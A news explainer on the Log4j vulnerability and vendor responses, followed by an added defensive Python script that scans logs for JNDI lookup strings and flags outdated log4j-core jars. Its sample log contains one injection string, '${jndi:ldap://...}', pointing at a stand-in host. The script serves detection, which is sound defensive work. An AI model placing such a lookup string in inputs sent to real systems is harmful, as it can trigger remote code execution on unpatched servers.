A major security flaw has been discovered in a piece of software called Log4j, which is used by millions of web servers. The bug leaves them vulnerable to attack, and teams around the world are scrambling to patch affected systems before hackers can exploit them.
It was first discovered by Minecraft players, but it was soon realised that this wasn’t just a Minecraft exploit: it works against every program that uses the Log4j library. Here’s how tech companies are responding to a security flaw that is potentially capable of putting the entire internet at risk.
- Microsoft said that the Log4j vulnerability will not only affect machines that mine cryptocurrencies but can also cause more serious problems such as credential and data theft.
- Google Cloud in its security advisory notes that it is actively following the security vulnerability. “We are currently assessing the potential impact of the vulnerability for Google Cloud products and services. This is an ongoing event and we will continue to provide updates through our customer communications channels.”
- VMware Inc., which makes computer virtualisation software, said Thursday that several of its products were likely affected by the Java-based Log4j vulnerability. The cloud computing company listed all of its products and versions that are affected by the vulnerability.
Attackers can trick Log4j into running malicious code by getting it to write a log entry that contains a particular string of text. The way hackers do this varies from program to program, but in Minecraft it has been reported that it was done via the chat box. A log entry is created to archive each chat message, so if the dangerous string of text is sent from one user to another it ends up in the log.
What Can Be Done
Now hundreds of thousands of IT teams are scrambling to update Log4j to version 2.15.0, which mostly fixes the issue. Teams will also need to scour their code for potential vulnerabilities and watch for hacking attempts. While patches for problems like this can emerge very quickly, especially when the flaw is responsibly disclosed to the development team, it takes time for everyone to apply them. Computers and web services are now so complex, and so layered with dozens of stacked levels of abstraction, code running on code, on code, that it could take months for all these services to update.
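Two of the defensive tasks described above, watching logs for the lookup string and finding copies of Log4j that are older than the fixed release, can be scripted. The following is an added example, not code from the article or from the Log4j project; the log lines and jar names are constructed, and the `${jndi:` lookup syntax is the publicly documented pattern Log4j expands into a remote JNDI fetch.

```python
import re

# Constructed sample data (not from the article): a few log lines as a
# chat-logging game server might write them, plus a jar listing from a
# classpath. Only the third log line carries the dangerous lookup.
SAMPLE_LOG = """\
2021-12-10T10:01:02Z INFO  Player alice joined the game
2021-12-10T10:01:05Z INFO  <alice> hello everyone
2021-12-10T10:01:09Z INFO  <mallory> ${jndi:ldap://placeholder.invalid/x}
2021-12-10T10:01:11Z INFO  <bob> the server time is ${date:HH:mm}
"""
SAMPLE_JARS = ["log4j-api-2.14.1.jar", "log4j-core-2.14.1.jar",
               "guava-30.1.jar", "log4j-core-2.15.0.jar"]

# Log4j expands "${...}" lookups found inside logged text. Most lookups
# (date, env, ...) are harmless; the JNDI one fetches and runs remote code,
# so that is the prefix to alert on. Matched case-insensitively.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
CORE_JAR = re.compile(r"log4j-core-(\d+)\.(\d+)\.(\d+)\.jar$")
MINIMUM_FIXED = (2, 15, 0)   # the release the article names as the fix

def suspicious_lines(log_text: str) -> list[str]:
    """Return the log lines that carry a JNDI lookup, for alerting."""
    return [line for line in log_text.splitlines()
            if JNDI_LOOKUP.search(line)]

def vulnerable_jars(jar_names: list[str]) -> list[str]:
    """Return the log4j-core jars older than the minimum fixed release."""
    hits = []
    for name in jar_names:
        m = CORE_JAR.search(name)
        if m and tuple(int(g) for g in m.groups()) < MINIMUM_FIXED:
            hits.append(name)
    return hits

if __name__ == "__main__":
    for line in suspicious_lines(SAMPLE_LOG):
        print("ALERT: lookup string in log:", line)
    for jar in vulnerable_jars(SAMPLE_JARS):
        print("UPDATE needed:", jar)
```

Point `suspicious_lines` at real log files and `vulnerable_jars` at the jars on a server's classpath; both return lists so they slot into an alerting or inventory script.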